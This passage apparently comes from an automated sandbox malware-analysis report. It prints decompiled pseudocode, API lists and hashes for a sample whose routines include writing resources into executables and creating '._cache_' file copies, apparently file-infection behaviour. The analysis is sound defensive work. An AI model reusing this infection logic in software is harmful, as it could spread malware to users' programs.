				intOrPtr _t69;

				_t67 = _t68;
				_t69 = _t68 + 0xffffffec;
				_v12 = __ecx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t67);
				_push(0x474bff);
				_push( *[fs:eax]);
				 *[fs:eax] = _t69;
				_v24 = E00409A7C(_v8);
				E00409A90(_v8, 0x80);
				_t33 = BeginUpdateResourceA(E00404E80(_v8), 0); // executed
				_t53 = _t33;
				_v13 = _t53 != 0;
				if(_v13 == 0) {
					E00409A90(_v8, _v24);
					_pop(_t61);
					 *[fs:eax] = _t61;
					_push(0x474c06);
					return E004049E4( &_v12, 2);
				} else {
					_push(_t67);
					_push(0x474bd2);
					_push( *[fs:eax]);
					 *[fs:eax] = _t69;
					_v20 = E0040275C(0);
					_t45 = UpdateResourceA(_t53, 0xa, E00404E80(_v12), 0, _v20, 0);
					asm("sbb eax, eax");
					_v13 = _t45 + 1;
					if(EndUpdateResourceA(_t53, 0) == 0 || _v13 == 0) {
						_t48 = 0;
					} else {
						_t48 = 1;
					}
					_v13 = _t48;
					_pop(_t63);
					 *[fs:eax] = _t63;
					_push(0x474bd9);
					return E0040277C(_v20);
				}
			}

















                                                    0x00474b05
                                                    0x00474b07
                                                    0x00474b0c
                                                    0x00474b0f
                                                    0x00474b15
                                                    0x00474b1d
                                                    0x00474b24
                                                    0x00474b25
                                                    0x00474b2a
                                                    0x00474b2d
                                                    0x00474b38
                                                    0x00474b43
                                                    0x00474b53
                                                    0x00474b58
                                                    0x00474b5c
                                                    0x00474b64
                                                    0x00474bdf
                                                    0x00474be6
                                                    0x00474be9
                                                    0x00474bec
                                                    0x00474bfe
                                                    0x00474b66
                                                    0x00474b68
                                                    0x00474b69
                                                    0x00474b6e
                                                    0x00474b71
                                                    0x00474b7d
                                                    0x00474b93
                                                    0x00474b9b
                                                    0x00474b9e
                                                    0x00474bab
                                                    0x00474bb3
                                                    0x00474bb7
                                                    0x00474bb7
                                                    0x00474bb7
                                                    0x00474bb9
                                                    0x00474bbe
                                                    0x00474bc1
                                                    0x00474bc4
                                                    0x00474bd1
                                                    0x00474bd1

                                                    APIs
                                                      • Part of subcall function 00409A7C: GetFileAttributesA.KERNEL32(00000000,?,00474B38,00000000,00474BFF), ref: 00409A87
                                                      • Part of subcall function 00409A90: SetFileAttributesA.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AA2
                                                      • Part of subcall function 00409A90: GetLastError.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,004738AF), ref: 00409AAB
                                                    • BeginUpdateResourceA.KERNEL32 ref: 00474B53
                                                    • UpdateResourceA.KERNEL32(00000000,0000000A,00000000,00000000,?,00000000), ref: 00474B93
                                                    • EndUpdateResourceA.KERNEL32 ref: 00474BA4
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ResourceUpdate$AttributesFile$BeginErrorLast
                                                    • String ID:
                                                    • API String ID: 3622334292-0
                                                    • Opcode ID: 0c6025a9ba0c3fa00e0f0c327aa18df6933148c4a27423e708942d437b537846
                                                    • Instruction ID: 52e1684931c8bafc800cdd43f2787b7e22df09697c22c7a3fc8d55225dfd733d
                                                    • Opcode Fuzzy Hash: 0c6025a9ba0c3fa00e0f0c327aa18df6933148c4a27423e708942d437b537846
                                                    • Instruction Fuzzy Hash: A6216470B04244AFDB01EBB5DC42BAEB7A9EB45704F5144BBF404F2691D778AE10D658
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004015B4 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 37memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004015B4(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E00401468(0x49e5ec, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}







                                                    0x004015b7
                                                    0x004015c1
                                                    0x004015d0
                                                    0x004015c3
                                                    0x004015c3
                                                    0x004015c3
                                                    0x004015d6
                                                    0x004015e3
                                                    0x004015e8
                                                    0x004015ea
                                                    0x004015ee
                                                    0x004015f7
                                                    0x004015fe
                                                    0x0040160a
                                                    0x00401611
                                                    0x00000000
                                                    0x00401611
                                                    0x004015fe
                                                    0x00401616

                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004018BD), ref: 004015E3
                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004018BD), ref: 0040160A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Virtual$AllocFree
                                                    • String ID: I
                                                    • API String ID: 2087232378-1966777607
                                                    • Opcode ID: c1566d8f6abf6d80f03d096eeda82e70b725eacd03a30ec4fb637c5d0c7dd738
                                                    • Instruction ID: 653e09eb2cf8d2b73dae0cb6bd44d4e3f867a6d1f4cfde1ef7f913290877d0a1
                                                    • Opcode Fuzzy Hash: c1566d8f6abf6d80f03d096eeda82e70b725eacd03a30ec4fb637c5d0c7dd738
                                                    • Instruction Fuzzy Hash: FEF02772F003202BEB3059AA4CC1B535AC49F857A4F194076FD08FF3E9D6B58C0142A9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00477AD8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 180COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 57%
                                                    			E00477AD8(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v13;
				char _v14;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v56;
				char _v72;
				char _v76;
				char _v80;
				void* __ecx;
				struct HINSTANCE__* _t54;
				void* _t65;
				void* _t67;
				intOrPtr _t120;
				void* _t123;
				struct HINSTANCE__* _t130;
				struct HINSTANCE__* _t133;
				intOrPtr _t141;
				intOrPtr _t145;
				intOrPtr _t146;
				intOrPtr _t153;
				intOrPtr _t157;
				intOrPtr _t161;
				intOrPtr _t162;

				_t159 = __esi;
				_t158 = __edi;
				_t161 = _t162;
				_t120 = 9;
				do {
					_push(0);
					_push(0);
					_t120 = _t120 - 1;
				} while (_t120 != 0);
				_t1 =  &_v8;
				 *_t1 = _t120;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v13 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				_push(_t161);
				_push(0x477dae);
				_push( *[fs:eax]);
				 *[fs:eax] = _t162;
				_t118 = E00404E80(_v8);
				_t54 =  *0x49e668; // 0x400000
				if(FindResourceA(_t54, _t53, 0xa) != 0) {
					_v14 = 1;
					L00409F48( &_v28);
					_push(_v28);
					_push(0x477dc8);
					_push("._cache_");
					E00402B68(0,  &_v36);
					L00409E18(_v36,  &_v32);
					_push(_v32);
					E00404D40();
					_push(_t161);
					_push(0x477d03);
					_push( *[fs:eax]);
					 *[fs:eax] = _t162;
					_t65 = E00409A48(_v24, __eflags);
					__eflags = _t65;
					if(_t65 != 0) {
						_t67 = E00474C10(_v24, _t118, _v8, __edi, __esi);
						__eflags = _t67;
						if(_t67 != 0) {
							E00409A90(_v24, 0x80);
							L00409BAC(_v24);
							E00404BB8( &_v56, _t118);
							_t130 =  *0x49e668; // 0x400000
							_v20 = E0041E0D0(_t130, 1, 0xa, _v56);
							_push(_t161);
							_push(0x477ca2);
							_push( *[fs:eax]);
							 *[fs:eax] = _t162;
							E0041DD9C(_v20, _t118, _v24, _t158);
							_pop(_t153);
							 *[fs:eax] = _t153;
							L00403BEC(_v20);
						}
					} else {
						E00404BB8( &_v40, _t118);
						_t133 =  *0x49e668; // 0x400000
						_v20 = E0041E0D0(_t133, 1, 0xa, _v40);
						_push(_t161);
						_push(0x477bd6);
						_push( *[fs:eax]);
						 *[fs:eax] = _t162;
						E0041DD9C(_v20, _t118, _v24, __edi); // executed
						_pop(_t157);
						 *[fs:eax] = _t157;
						L00403BEC(_v20);
					}
					_pop(_t141);
					_pop(_t123);
					 *[fs:eax] = _t141;
					__eflags = 0;
					_push(_t161);
					_push(0x477d81);
					_push( *[fs:eax]);
					 *[fs:eax] = _t162;
					E00409A90(_v24, 6);
					E00472EF0( &_v72, _t118, _t123, __eflags);
					E00404DCC(_v72, 0x477de8);
					if(__eflags == 0) {
						E0047475C( &_v80, _t118, _t158, _t159, __eflags);
						E00473490(_v12, _t118, _v80, _v24, __eflags, 0, 0);
					} else {
						E0047475C( &_v76, _t118, _t158, _t159, __eflags);
						E00473490(_v12, _t118, _v76, _v24, __eflags, 0, _v13); // executed
					}
					_pop(_t145);
					 *[fs:eax] = _t145;
				} else {
					_v14 = 0;
				}
				_pop(_t146);
				 *[fs:eax] = _t146;
				_push(0x477db5);
				E004049E4( &_v80, 0xf);
				return E004049C0( &_v8);
			}
































                                                    0x00477ad8
                                                    0x00477ad8
                                                    0x00477ad9
                                                    0x00477adc
                                                    0x00477ae1
                                                    0x00477ae1
                                                    0x00477ae3
                                                    0x00477ae5
                                                    0x00477ae5
                                                    0x00477ae8
                                                    0x00477ae8
                                                    0x00477aeb
                                                    0x00477aec
                                                    0x00477aed
                                                    0x00477aee
                                                    0x00477af1
                                                    0x00477af4
                                                    0x00477afa
                                                    0x00477b01
                                                    0x00477b02
                                                    0x00477b07
                                                    0x00477b0a
                                                    0x00477b17
                                                    0x00477b1a
                                                    0x00477b27
                                                    0x00477b32
                                                    0x00477b39
                                                    0x00477b3e
                                                    0x00477b41
                                                    0x00477b46
                                                    0x00477b50
                                                    0x00477b5b
                                                    0x00477b60
                                                    0x00477b6b
                                                    0x00477b72
                                                    0x00477b73
                                                    0x00477b78
                                                    0x00477b7b
                                                    0x00477b81
                                                    0x00477b86
                                                    0x00477b88
                                                    0x00477c38
                                                    0x00477c3d
                                                    0x00477c3f
                                                    0x00477c4d
                                                    0x00477c55
                                                    0x00477c5f
                                                    0x00477c6a
                                                    0x00477c7c
                                                    0x00477c81
                                                    0x00477c82
                                                    0x00477c87
                                                    0x00477c8a
                                                    0x00477c93
                                                    0x00477c9a
                                                    0x00477c9d
                                                    0x00477cf4
                                                    0x00477cf4
                                                    0x00477b8e
                                                    0x00477b93
                                                    0x00477b9e
                                                    0x00477bb0
                                                    0x00477bb5
                                                    0x00477bb6
                                                    0x00477bbb
                                                    0x00477bbe
                                                    0x00477bc7
                                                    0x00477bce
                                                    0x00477bd1
                                                    0x00477c28
                                                    0x00477c28
                                                    0x00477cfb
                                                    0x00477cfd
                                                    0x00477cfe
                                                    0x00477d0d
                                                    0x00477d0f
                                                    0x00477d10
                                                    0x00477d15
                                                    0x00477d18
                                                    0x00477d23
                                                    0x00477d2b
                                                    0x00477d38
                                                    0x00477d3d
                                                    0x00477d64
                                                    0x00477d72
                                                    0x00477d3f
                                                    0x00477d48
                                                    0x00477d56
                                                    0x00477d56
                                                    0x00477d79
                                                    0x00477d7c
                                                    0x00477b29
                                                    0x00477b29
                                                    0x00477b29
                                                    0x00477d8d
                                                    0x00477d90
                                                    0x00477d93
                                                    0x00477da0
                                                    0x00477dad

                                                    APIs
                                                    • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 00477B20
                                                      • Part of subcall function 00402B68: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,?,00000000,00474795,004747D4,?,00000000,004747BE,?,?,?,?,00000000), ref: 00402B8C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileFindModuleNameResource
                                                    • String ID: ._cache_
                                                    • API String ID: 938654709-4202169512
                                                    • Opcode ID: 1813762d8ab73c72f462dcf35abd4216ef9f666e93594e03b5b88217cc4ef2bb
                                                    • Instruction ID: f4b1b61c27c6b3fcd429a4d8c4df21a5758f96423c611e3672b605c149e07d86
                                                    • Opcode Fuzzy Hash: 1813762d8ab73c72f462dcf35abd4216ef9f666e93594e03b5b88217cc4ef2bb
                                                    • Instruction Fuzzy Hash: 7D61D430A042099FDB11EFA5D852AEEB7B9EF49704F60847BF504B7291D739AD01CB68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00478CB0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 72%
                                                    			E00478CB0(void* __edx) {
				intOrPtr _t3;
				intOrPtr* _t5;
				intOrPtr* _t6;
				intOrPtr* _t7;
				intOrPtr _t14;
				intOrPtr _t18;
				intOrPtr _t21;

				_push(_t21);
				_push(0x478d26);
				_push( *[fs:eax]);
				 *[fs:eax] = _t21;
				 *0x49ec80 =  *0x49ec80 + 1;
				if( *0x49ec80 == 0) {
					 *0x49ec84 = 1;
					_t3 =  *0x49ec88; // 0x0
					L00403BEC(_t3);
					_t5 =  *0x49dc9c; // 0x49e020
					 *_t5 = 0;
					_t6 =  *0x49d7a8; // 0x49e000
					 *_t6 = 0;
					_t7 =  *0x49dc20; // 0x49e810
					 *_t7 = 0;
					if( *0x49ec90 != 0) {
						L00417DFC(); // executed
					}
					_t18 =  *0x401094; // 0x401098
					E004054C8(0x49c9e8, 5, _t18);
				}
				_pop(_t14);
				 *[fs:eax] = _t14;
				_push(0x478d2d);
				return 0;
			}










                                                    0x00478cb5
                                                    0x00478cb6
                                                    0x00478cbb
                                                    0x00478cbe
                                                    0x00478cc1
                                                    0x00478cc7
                                                    0x00478cc9
                                                    0x00478cd0
                                                    0x00478cd5
                                                    0x00478cda
                                                    0x00478ce1
                                                    0x00478ce3
                                                    0x00478cea
                                                    0x00478cec
                                                    0x00478cf3
                                                    0x00478cfc
                                                    0x00478cfe
                                                    0x00478cfe
                                                    0x00478d0d
                                                    0x00478d13
                                                    0x00478d13
                                                    0x00478d1a
                                                    0x00478d1d
                                                    0x00478d20
                                                    0x00478d25

                                                    APIs
                                                    • 742FF460.OLE32(00000000,00478D26), ref: 00478CFE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: F460
                                                    • String ID: I
                                                    • API String ID: 329004136-429267355
                                                    • Opcode ID: 9cca7072fc9e56bcc694ba2f6119dd7fbf3d3764145fe58f9e0d1812247d53b8
                                                    • Instruction ID: 9009332550508c6597b3b9da99e6bfd18627bf9d89c0e286b3a7dbd72528ea00
                                                    • Opcode Fuzzy Hash: 9cca7072fc9e56bcc694ba2f6119dd7fbf3d3764145fe58f9e0d1812247d53b8
                                                    • Instruction Fuzzy Hash: 43F0A4706046408FF315DF2AED156567BE5EBA9304B828477E408976B1DE785802CB1C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040484C Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E0040484C() {
				struct HINSTANCE__* _t24;
				void* _t32;
				intOrPtr _t35;
				void* _t45;

				if( *0x0049E660 != 0 ||  *0x49e048 == 0) {
					L3:
					if( *0x49b004 != 0) {
						E00404734();
						E004047C0(_t32);
						 *0x49b004 = 0;
					}
					L5:
					while(1) {
						if( *((char*)(0x49e660)) == 2 &&  *0x49b000 == 0) {
							 *0x0049E644 = 0;
						}
						E004045C4(); // executed
						if( *((char*)(0x49e660)) <= 1 ||  *0x49b000 != 0) {
							_t14 =  *0x0049E648;
							if( *0x0049E648 != 0) {
								E0040653C(_t14);
								_t35 =  *((intOrPtr*)(0x49e648));
								_t7 = _t35 + 0x10; // 0x400000
								_t24 =  *_t7;
								_t8 = _t35 + 4; // 0x400000
								if(_t24 !=  *_t8 && _t24 != 0) {
									FreeLibrary(_t24);
								}
							}
						}
						E0040459C();
						if( *((char*)(0x49e660)) == 1) {
							 *0x0049E65C();
						}
						if( *((char*)(0x49e660)) != 0) {
							E00404790();
						}
						if( *0x49e638 == 0) {
							if( *0x49e028 != 0) {
								 *0x49e028();
							}
							ExitProcess( *0x49b000); // executed
						}
						memcpy(0x49e638,  *0x49e638, 0xb << 2);
						_t45 = _t45 + 0xc;
						0x49b000 = 0x49b000;
					}
				} else {
					do {
						 *0x49e048 = 0;
						 *((intOrPtr*)( *0x49e048))();
					} while ( *0x49e048 != 0);
					goto L3;
				}
			}







                                                    0x00404863
                                                    0x0040487b
                                                    0x00404882
                                                    0x00404884
                                                    0x00404889
                                                    0x00404890
                                                    0x00404890
                                                    0x00000000
                                                    0x00404895
                                                    0x00404899
                                                    0x004048a2
                                                    0x004048a2
                                                    0x004048a5
                                                    0x004048ae
                                                    0x004048b5
                                                    0x004048ba
                                                    0x004048bc
                                                    0x004048c1
                                                    0x004048c4
                                                    0x004048c4
                                                    0x004048c7
                                                    0x004048ca
                                                    0x004048d1
                                                    0x004048d1
                                                    0x004048ca
                                                    0x004048ba
                                                    0x004048d6
                                                    0x004048df
                                                    0x004048e1
                                                    0x004048e1
                                                    0x004048e8
                                                    0x004048ea
                                                    0x004048ea
                                                    0x004048f2
                                                    0x004048fb
                                                    0x004048fd
                                                    0x004048fd
                                                    0x00404906
                                                    0x00404906
                                                    0x00404917
                                                    0x00404917
                                                    0x00404919
                                                    0x00404919
                                                    0x0040486a
                                                    0x0040486a
                                                    0x00404870
                                                    0x00404874
                                                    0x00404876
                                                    0x00000000
                                                    0x0040486a

                                                    APIs
                                                    • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 004048D1
                                                    • ExitProcess.KERNEL32(00000000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 00404906
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitFreeLibraryProcess
                                                    • String ID:
                                                    • API String ID: 1404682716-0
                                                    • Opcode ID: aace151720c6b04e09c8da3b3daabfaf2305c7a6b183d5e44d56bdc4e9efabf5
                                                    • Instruction ID: 8f7f5b5083db65be3b92a9b52f1338e088dbfa5033c12c2e4b8cbee57b0dbfcd
                                                    • Opcode Fuzzy Hash: aace151720c6b04e09c8da3b3daabfaf2305c7a6b183d5e44d56bdc4e9efabf5
                                                    • Instruction Fuzzy Hash: 88217CFA900285AFEB20AF66848475777D1AF89314F24897B9A04A72C6D77CCCD0C75D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00404844 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E00404844() {
				intOrPtr* _t13;
				struct HINSTANCE__* _t27;
				void* _t36;
				intOrPtr _t39;
				void* _t52;

				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
				if( *0x0049E660 != 0 ||  *0x49e048 == 0) {
					L5:
					if( *0x49b004 != 0) {
						E00404734();
						E004047C0(_t36);
						 *0x49b004 = 0;
					}
					L7:
					if( *((char*)(0x49e660)) == 2 &&  *0x49b000 == 0) {
						 *0x0049E644 = 0;
					}
					E004045C4(); // executed
					if( *((char*)(0x49e660)) <= 1 ||  *0x49b000 != 0) {
						_t17 =  *0x0049E648;
						if( *0x0049E648 != 0) {
							E0040653C(_t17);
							_t39 =  *((intOrPtr*)(0x49e648));
							_t7 = _t39 + 0x10; // 0x400000
							_t27 =  *_t7;
							_t8 = _t39 + 4; // 0x400000
							if(_t27 !=  *_t8 && _t27 != 0) {
								FreeLibrary(_t27);
							}
						}
					}
					E0040459C();
					if( *((char*)(0x49e660)) == 1) {
						 *0x0049E65C();
					}
					if( *((char*)(0x49e660)) != 0) {
						E00404790();
					}
					if( *0x49e638 == 0) {
						if( *0x49e028 != 0) {
							 *0x49e028();
						}
						ExitProcess( *0x49b000); // executed
					}
					memcpy(0x49e638,  *0x49e638, 0xb << 2);
					_t52 = _t52 + 0xc;
					0x49b000 = 0x49b000;
					goto L7;
				} else {
					do {
						 *0x49e048 = 0;
						 *((intOrPtr*)( *0x49e048))();
					} while ( *0x49e048 != 0);
					goto L5;
				}
			}








                                                    0x00404846
                                                    0x00404863
                                                    0x0040487b
                                                    0x00404882
                                                    0x00404884
                                                    0x00404889
                                                    0x00404890
                                                    0x00404890
                                                    0x00404895
                                                    0x00404899
                                                    0x004048a2
                                                    0x004048a2
                                                    0x004048a5
                                                    0x004048ae
                                                    0x004048b5
                                                    0x004048ba
                                                    0x004048bc
                                                    0x004048c1
                                                    0x004048c4
                                                    0x004048c4
                                                    0x004048c7
                                                    0x004048ca
                                                    0x004048d1
                                                    0x004048d1
                                                    0x004048ca
                                                    0x004048ba
                                                    0x004048d6
                                                    0x004048df
                                                    0x004048e1
                                                    0x004048e1
                                                    0x004048e8
                                                    0x004048ea
                                                    0x004048ea
                                                    0x004048f2
                                                    0x004048fb
                                                    0x004048fd
                                                    0x004048fd
                                                    0x00404906
                                                    0x00404906
                                                    0x00404917
                                                    0x00404917
                                                    0x00404919
                                                    0x00000000
                                                    0x0040486a
                                                    0x0040486a
                                                    0x00404870
                                                    0x00404874
                                                    0x00404876
                                                    0x00000000
                                                    0x0040486a

                                                    APIs
                                                    • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 004048D1
                                                    • ExitProcess.KERNEL32(00000000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 00404906
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitFreeLibraryProcess
                                                    • String ID:
                                                    • API String ID: 1404682716-0
                                                    • Opcode ID: 21e905b02f2b03465b5a9f80233f0ae414486a0d2daa4ba7a7ebcfa5846c7405
                                                    • Instruction ID: 883b3613692aa30e866907f4332a392e5c305926fac8e5934d264d12186bf84f
                                                    • Opcode Fuzzy Hash: 21e905b02f2b03465b5a9f80233f0ae414486a0d2daa4ba7a7ebcfa5846c7405
                                                    • Instruction Fuzzy Hash: 4F218CF5900285AFEB21AF6684847563BE1AF95314F1488BBDA04A62C6D37CDCD0CB5D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00404848 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E00404848() {
				struct HINSTANCE__* _t26;
				void* _t35;
				intOrPtr _t38;
				void* _t51;

				if( *0x0049E660 != 0 ||  *0x49e048 == 0) {
					L4:
					if( *0x49b004 != 0) {
						E00404734();
						E004047C0(_t35);
						 *0x49b004 = 0;
					}
					L6:
					if( *((char*)(0x49e660)) == 2 &&  *0x49b000 == 0) {
						 *0x0049E644 = 0;
					}
					E004045C4(); // executed
					if( *((char*)(0x49e660)) <= 1 ||  *0x49b000 != 0) {
						_t16 =  *0x0049E648;
						if( *0x0049E648 != 0) {
							E0040653C(_t16);
							_t38 =  *((intOrPtr*)(0x49e648));
							_t7 = _t38 + 0x10; // 0x400000
							_t26 =  *_t7;
							_t8 = _t38 + 4; // 0x400000
							if(_t26 !=  *_t8 && _t26 != 0) {
								FreeLibrary(_t26);
							}
						}
					}
					E0040459C();
					if( *((char*)(0x49e660)) == 1) {
						 *0x0049E65C();
					}
					if( *((char*)(0x49e660)) != 0) {
						E00404790();
					}
					if( *0x49e638 == 0) {
						if( *0x49e028 != 0) {
							 *0x49e028();
						}
						ExitProcess( *0x49b000); // executed
					}
					memcpy(0x49e638,  *0x49e638, 0xb << 2);
					_t51 = _t51 + 0xc;
					0x49b000 = 0x49b000;
					goto L6;
				} else {
					do {
						 *0x49e048 = 0;
						 *((intOrPtr*)( *0x49e048))();
					} while ( *0x49e048 != 0);
					goto L4;
				}
			}







                                                    0x00404863
                                                    0x0040487b
                                                    0x00404882
                                                    0x00404884
                                                    0x00404889
                                                    0x00404890
                                                    0x00404890
                                                    0x00404895
                                                    0x00404899
                                                    0x004048a2
                                                    0x004048a2
                                                    0x004048a5
                                                    0x004048ae
                                                    0x004048b5
                                                    0x004048ba
                                                    0x004048bc
                                                    0x004048c1
                                                    0x004048c4
                                                    0x004048c4
                                                    0x004048c7
                                                    0x004048ca
                                                    0x004048d1
                                                    0x004048d1
                                                    0x004048ca
                                                    0x004048ba
                                                    0x004048d6
                                                    0x004048df
                                                    0x004048e1
                                                    0x004048e1
                                                    0x004048e8
                                                    0x004048ea
                                                    0x004048ea
                                                    0x004048f2
                                                    0x004048fb
                                                    0x004048fd
                                                    0x004048fd
                                                    0x00404906
                                                    0x00404906
                                                    0x00404917
                                                    0x00404917
                                                    0x00404919
                                                    0x00000000
                                                    0x0040486a
                                                    0x0040486a
                                                    0x00404870
                                                    0x00404874
                                                    0x00404876
                                                    0x00000000
                                                    0x0040486a

                                                    APIs
                                                    • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 004048D1
                                                    • ExitProcess.KERNEL32(00000000,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000,00402794,?,?,?,00000000), ref: 00404906
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitFreeLibraryProcess
                                                    • String ID:
                                                    • API String ID: 1404682716-0
                                                    • Opcode ID: d546d851f69e48fd9f4b53ba4d22cf809c9b4c72d8268e3f297f4199c42bff18
                                                    • Instruction ID: 9fe47824b19111ae0d82b188d774791a2e79eaf21524d9292fd64a79079edc68
                                                    • Opcode Fuzzy Hash: d546d851f69e48fd9f4b53ba4d22cf809c9b4c72d8268e3f297f4199c42bff18
                                                    • Instruction Fuzzy Hash: 87216DF5900285AFEB20AF66C48475677E1AF95314F14887B9A04A62C6D37CDCD0CB5D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401748 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 54memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00401748(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x49e5ec; // 0x49e5ec
				while(_t29 != 0x49e5ec) {
					_t7 = _t29 + 8; // 0x0
					_t17 =  *_t7;
					_t8 = _t29 + 0xc; // 0x0
					_t27 =  *_t8 + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}












                                                    0x0040174f
                                                    0x00401753
                                                    0x0040175a
                                                    0x0040176f
                                                    0x00401777
                                                    0x0040177d
                                                    0x00401783
                                                    0x00401786
                                                    0x004017ca
                                                    0x0040178e
                                                    0x0040178e
                                                    0x00401791
                                                    0x00401794
                                                    0x00401798
                                                    0x0040179a
                                                    0x0040179a
                                                    0x004017a0
                                                    0x004017a2
                                                    0x004017a2
                                                    0x004017a8
                                                    0x004017b5
                                                    0x004017bc
                                                    0x004017be
                                                    0x004017c4
                                                    0x00000000
